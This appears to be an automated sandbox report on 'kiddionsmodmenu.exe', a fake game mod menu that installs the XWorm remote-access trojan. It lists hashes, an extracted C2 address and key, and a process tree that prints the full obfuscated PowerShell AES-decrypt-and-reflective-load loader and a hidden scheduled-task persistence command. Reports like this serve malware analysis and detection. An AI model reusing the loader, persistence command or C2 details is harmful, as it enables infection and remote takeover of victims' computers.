Resubmissions
14-05-2024 11:22
240514-ngk71sdg28 1014-05-2024 11:22
240514-ngkw9add6y 1014-05-2024 11:22
240514-ngklgsdg27 1014-05-2024 11:22
240514-ngkaqadd6w 1014-05-2024 11:22
240514-ngjzysdd6v 1014-05-2024 11:22
240514-ngjn7add6t 1014-05-2024 11:22
240514-ngh3nadd6s 1014-05-2024 11:22
240514-ngh3nadg25 1014-05-2024 11:21
240514-nghrwsdd51 1014-05-2024 11:21
240514-ngg6csdd5z 10Analysis
-
max time kernel
133s -
max time network
152s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
14-05-2024 11:22
Static task
static1
Behavioral task
behavioral1
Sample
kiddionsmodmenu.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
kiddionsmodmenu.exe
Resource
win7-20240215-en
Behavioral task
behavioral3
Sample
kiddionsmodmenu.exe
Resource
win10v2004-20240508-en
General
-
Target
kiddionsmodmenu.exe
-
Size
386KB
-
MD5
88e737816cc5f3e3809152c5f9dad5be
-
SHA1
56dedf42285c74795f714dbac7782a5d0e695a97
-
SHA256
6d09d43c755d5081924748104ac487afadaf68add75d85feb2a256de032a5e2c
-
SHA512
8d29b5606f91b953263738f03188a56a4c981a6213b53a830bd1e3975ff3d10274704df2dda957fa0b73cd8841947d6e850c6046338b8ebe9666ca895ce0eebd
-
SSDEEP
12288:hFPdfNMz0ECh63X3u+DnSmMk1B+8kxkpTD:hddFMz0EH3X39DnL3PHkxgn
Malware Config
Extracted
xworm
5.0
94.156.8.167:2020
8sPZSP21r8KwS1LM
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/2772-274-0x000000000A480000-0x000000000A48E000-memory.dmp family_xworm -
Blocklisted process makes network request 1 IoCs
flow pid Process 2 2772 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 4520 powershell.exe 620 powershell.exe 2772 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 4520 powershell.exe 4520 powershell.exe 4520 powershell.exe 620 powershell.exe 620 powershell.exe 620 powershell.exe 2772 powershell.exe 2772 powershell.exe 2772 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4520 powershell.exe Token: SeDebugPrivilege 620 powershell.exe Token: SeIncreaseQuotaPrivilege 620 powershell.exe Token: SeSecurityPrivilege 620 powershell.exe Token: SeTakeOwnershipPrivilege 620 powershell.exe Token: SeLoadDriverPrivilege 620 powershell.exe Token: SeSystemProfilePrivilege 620 powershell.exe Token: SeSystemtimePrivilege 620 powershell.exe Token: SeProfSingleProcessPrivilege 620 powershell.exe Token: SeIncBasePriorityPrivilege 620 powershell.exe Token: SeCreatePagefilePrivilege 620 powershell.exe Token: SeBackupPrivilege 620 powershell.exe Token: SeRestorePrivilege 620 powershell.exe Token: SeShutdownPrivilege 620 powershell.exe Token: SeDebugPrivilege 620 powershell.exe Token: SeSystemEnvironmentPrivilege 620 powershell.exe Token: SeRemoteShutdownPrivilege 620 powershell.exe Token: SeUndockPrivilege 620 powershell.exe Token: SeManageVolumePrivilege 620 powershell.exe Token: 33 620 powershell.exe Token: 34 620 powershell.exe Token: 35 620 powershell.exe Token: 36 620 powershell.exe Token: SeIncreaseQuotaPrivilege 620 powershell.exe Token: SeSecurityPrivilege 620 powershell.exe Token: SeTakeOwnershipPrivilege 620 powershell.exe Token: SeLoadDriverPrivilege 620 powershell.exe Token: SeSystemProfilePrivilege 620 powershell.exe Token: SeSystemtimePrivilege 620 powershell.exe Token: SeProfSingleProcessPrivilege 620 powershell.exe Token: SeIncBasePriorityPrivilege 620 powershell.exe Token: SeCreatePagefilePrivilege 620 powershell.exe Token: SeBackupPrivilege 620 powershell.exe Token: SeRestorePrivilege 620 powershell.exe Token: SeShutdownPrivilege 620 powershell.exe Token: SeDebugPrivilege 620 powershell.exe Token: SeSystemEnvironmentPrivilege 620 powershell.exe Token: SeRemoteShutdownPrivilege 620 powershell.exe Token: SeUndockPrivilege 620 powershell.exe Token: SeManageVolumePrivilege 620 powershell.exe Token: 33 620 powershell.exe Token: 34 620 powershell.exe Token: 35 620 powershell.exe Token: 36 620 powershell.exe Token: SeIncreaseQuotaPrivilege 620 powershell.exe Token: SeSecurityPrivilege 620 powershell.exe Token: SeTakeOwnershipPrivilege 620 powershell.exe Token: SeLoadDriverPrivilege 620 powershell.exe Token: SeSystemProfilePrivilege 620 powershell.exe Token: SeSystemtimePrivilege 620 powershell.exe Token: SeProfSingleProcessPrivilege 620 powershell.exe Token: SeIncBasePriorityPrivilege 620 powershell.exe Token: SeCreatePagefilePrivilege 620 powershell.exe Token: SeBackupPrivilege 620 powershell.exe Token: SeRestorePrivilege 620 powershell.exe Token: SeShutdownPrivilege 620 powershell.exe Token: SeDebugPrivilege 620 powershell.exe Token: SeSystemEnvironmentPrivilege 620 powershell.exe Token: SeRemoteShutdownPrivilege 620 powershell.exe Token: SeUndockPrivilege 620 powershell.exe Token: SeManageVolumePrivilege 620 powershell.exe Token: 33 620 powershell.exe Token: 34 620 powershell.exe Token: 35 620 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2424 wrote to memory of 2844 2424 kiddionsmodmenu.exe 74 PID 2424 wrote to memory of 2844 2424 kiddionsmodmenu.exe 74 PID 2424 wrote to memory of 2844 2424 kiddionsmodmenu.exe 74 PID 2844 wrote to memory of 696 2844 cmd.exe 77 PID 2844 wrote to memory of 696 2844 cmd.exe 77 PID 2844 wrote to memory of 696 2844 cmd.exe 77 PID 2844 wrote to memory of 4520 2844 cmd.exe 78 PID 2844 wrote to memory of 4520 2844 cmd.exe 78 PID 2844 wrote to memory of 4520 2844 cmd.exe 78 PID 4520 wrote to memory of 620 4520 powershell.exe 79 PID 4520 wrote to memory of 620 4520 powershell.exe 79 PID 4520 wrote to memory of 620 4520 powershell.exe 79 PID 4520 wrote to memory of 4552 4520 powershell.exe 82 PID 4520 wrote to memory of 4552 4520 powershell.exe 82 PID 4520 wrote to memory of 4552 4520 powershell.exe 82 PID 4552 wrote to memory of 1988 4552 WScript.exe 83 PID 4552 wrote to memory of 1988 4552 WScript.exe 83 PID 4552 wrote to memory of 1988 4552 WScript.exe 83 PID 1988 wrote to memory of 304 1988 cmd.exe 85 PID 1988 wrote to memory of 304 1988 cmd.exe 85 PID 1988 wrote to memory of 304 1988 cmd.exe 85 PID 1988 wrote to memory of 2772 1988 cmd.exe 86 PID 1988 wrote to memory of 2772 1988 cmd.exe 86 PID 1988 wrote to memory of 2772 1988 cmd.exe 86
Processes
-
C:\Users\Admin\AppData\Local\Temp\kiddionsmodmenu.exe"C:\Users\Admin\AppData\Local\Temp\kiddionsmodmenu.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS7927.tmp\XClient_Dealed.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j9v/MRsvo8rPIZTuYpVL9r5+b1tKh4/IvXdLJbSprpc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S2gRLww5OmjzwLPcS3ad8Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rcwOy=New-Object System.IO.MemoryStream(,$param_var); $TisVE=New-Object System.IO.MemoryStream; $XDooL=New-Object System.IO.Compression.GZipStream($rcwOy, [IO.Compression.CompressionMode]::Decompress); $XDooL.CopyTo($TisVE); $XDooL.Dispose(); $rcwOy.Dispose(); $TisVE.Dispose(); $TisVE.ToArray();}function execute_function($param_var,$param2_var){ $TXMac=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KbKqR=$TXMac.EntryPoint; $KbKqR.Invoke($null, $param2_var);}$IXbeQ = 'C:\Users\Admin\AppData\Local\Temp\7zS7927.tmp\XClient_Dealed.bat';$host.UI.RawUI.WindowTitle = $IXbeQ;$Ytldu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($IXbeQ).Split([Environment]::NewLine);foreach ($jWeCV in $Ytldu) { if ($jWeCV.StartsWith('PpiliAyQziuRKPrYAOkn')) { $YHaeW=$jWeCV.Substring(20); break; }}$payloads_var=[string[]]$YHaeW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:696
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_308_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_308.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:620
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_308.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_308.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j9v/MRsvo8rPIZTuYpVL9r5+b1tKh4/IvXdLJbSprpc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S2gRLww5OmjzwLPcS3ad8Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rcwOy=New-Object System.IO.MemoryStream(,$param_var); $TisVE=New-Object System.IO.MemoryStream; $XDooL=New-Object System.IO.Compression.GZipStream($rcwOy, [IO.Compression.CompressionMode]::Decompress); $XDooL.CopyTo($TisVE); $XDooL.Dispose(); $rcwOy.Dispose(); $TisVE.Dispose(); $TisVE.ToArray();}function execute_function($param_var,$param2_var){ $TXMac=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KbKqR=$TXMac.EntryPoint; $KbKqR.Invoke($null, $param2_var);}$IXbeQ = 'C:\Users\Admin\AppData\Roaming\Windows_Log_308.bat';$host.UI.RawUI.WindowTitle = $IXbeQ;$Ytldu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($IXbeQ).Split([Environment]::NewLine);foreach ($jWeCV in $Ytldu) { if ($jWeCV.StartsWith('PpiliAyQziuRKPrYAOkn')) { $YHaeW=$jWeCV.Substring(20); break; }}$payloads_var=[string[]]$YHaeW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:304
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2772
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5a8641a2f94483f12ba0cad0cf02a3bc7
SHA1fae3e6835336154b90503431279eef6c52a289d2
SHA256ce70f1a4578b12964dde1e1eef8cb1948847230bf3458dfd41f8e2c32c71c24d
SHA5125c92772168461d15ef6ed7b5ab2103cb63acfb1540d2d56610bbdd4a3494e866e47a225f6c7a42fa31f9170495dcddfad24533711289a6c3bfa5857a376b3e62
-
Filesize
18KB
MD58d923ac96e0d40b424d12375a82a43ab
SHA1cbddcf170363f67b907ee1b450607095c973d6a7
SHA2566d02b4948a27ee0fcecd8958b9c44d7c5c50066c0df99e3a9182c69ad990bd46
SHA512527ad00f55a471e3e7ae3071612f5d9689107e2896b2f5cf903a796c34768f10dd2c6a010c1831e1ee1cf5897f0b17213bf885301d2348a3464d7f381d3a331b
-
Filesize
152KB
MD50b426e8571f8d3e437b7a42e9b8fd808
SHA1986edba4c39be9edb552284dac555e2e95f68a4a
SHA2569c1a4e3a1c90d013a9465ab585ad7a9cfc378ebdbe77fc1548cb81c791e6914e
SHA512e2efb8ba96b4c11b6167f085d5545e7e4971850e3c57f76957b8a0b0e1896537d935d123de93c1ebfd3efab34139e9bf902911ba54f20ddffad21edeeb16b021
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
115B
MD521432e0b4500437da6a4bd6a1ad90261
SHA182459a33065e2c3f051718b590810b9a417897ac
SHA256030ec0739f7ff9cb7dfa0a538da4ab1c2b43ff9cf9723e7f247fb18aa27c3a64
SHA512388bcf00ee21fb107704d5a261fa8a5fe5df6762be5980d7617547b717404e7311d76b959deaf4cdcfa83e0988ba7f6e4d37a3c26ba3918476112386bd5cae28